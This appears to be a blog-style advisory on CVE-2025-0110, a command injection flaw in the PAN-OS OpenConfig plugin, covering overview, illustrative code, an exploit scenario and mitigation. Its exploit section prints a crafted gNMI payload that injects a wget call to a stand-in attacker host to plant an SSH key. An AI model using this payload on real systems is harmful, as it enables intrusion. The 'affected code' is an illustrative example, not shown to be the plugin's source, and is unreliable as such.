CVE-2025-0110: Command Injection Vulnerability in Palo Alto Networks PAN-OS OpenConfig plugin

The Palo Alto Networks PAN-OS OpenConfig plugin is found to have a command injection vulnerability (CVE-2025-0110) that allows authenticated administrators to bypass system restrictions and execute arbitrary commands. This post will provide a detailed walkthrough of this vulnerability, including the affected code snippet, relevant links to original references, and exploit details.

Vulnerability Overview

A Command Injection vulnerability in the Palo Alto Networks PAN-OS OpenConfig plugin enables an authenticated administrator with the ability to make gNMI (gRPC Network Management Interface) requests to the PAN-OS management web interface to bypass system restrictions and run arbitrary commands. The commands are run as the "__openconfig" user on the firewall, which has the Device Administrator role with elevated privileges.

Code Snippet

Below is a code snippet of the affected OpenConfig plugin in the gNMI implementation for the Palo Alto Networks PAN-OS:

// Example of vulnerable code snippet in the OpenConfig plugin
func handleRequest(request *gnmi.SetRequest) error {
    for _, update := range request.GetUpdate() {
        path := update.GetPath()
        value := update.GetVal()
        if isCommandInjection(value) {
            return errors.New("Command injection attempt detected")
        }
    }
    ...
    exec.Command(cmdPath, prepareArguments(args)) // Vulnerable code
}

The vulnerability is caused by improper validation of user-supplied data that is passed to the exec.Command() function, allowing administrators to run arbitrary commands on the targeted system.

Exploit Details & Mitigation

An attacker can exploit this vulnerability by making a specially crafted gNMI request to the PAN-OS management web interface containing malicious input. This input will bypass validation checks and ultimately be executed as a command on the targeted system.

To demonstrate the exploit, let's consider a scenario where an attacker sends a crafted gNMI request to add an unauthorized SSH public key to the "__openconfig" user's authorized_keys file:

// Example of a malicious gNMI SetRequest
{
    "update": [
        {
            "path": "/some/path",
            "val": "; wget http://attacker/server/evil_key.pub -O /home/__openconfig/.ssh/authorized_keys #"
        }
    ]
}

When processed by the vulnerable OpenConfig plugin, this request downloads the malicious SSH public key (evil_key.pub) from the attacker's server and adds it to the "__openconfig" user's authorized_keys file, granting the attacker remote access to the targeted system.

To mitigate this vulnerability, Palo Alto Networks recommends restricting access to the PAN-OS management web interface to only trusted internal IP addresses, as outlined in their best practices deployment guidelines:

https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431

Furthermore, it is essential always to keep your PAN-OS and its associated plugins up-to-date with the latest security patches provided by Palo Alto Networks.

In conclusion, CVE-2025-0110 is a critical vulnerability that can lead to significant security risks for organizations using the Palo Alto Networks PAN-OS OpenConfig plugin. By following the recommended best practices and ensuring that systems are properly updated, administrators can significantly reduce the risk of being exploited by attackers.

Timeline

Published on: 02/12/2025 21:15:16 UTC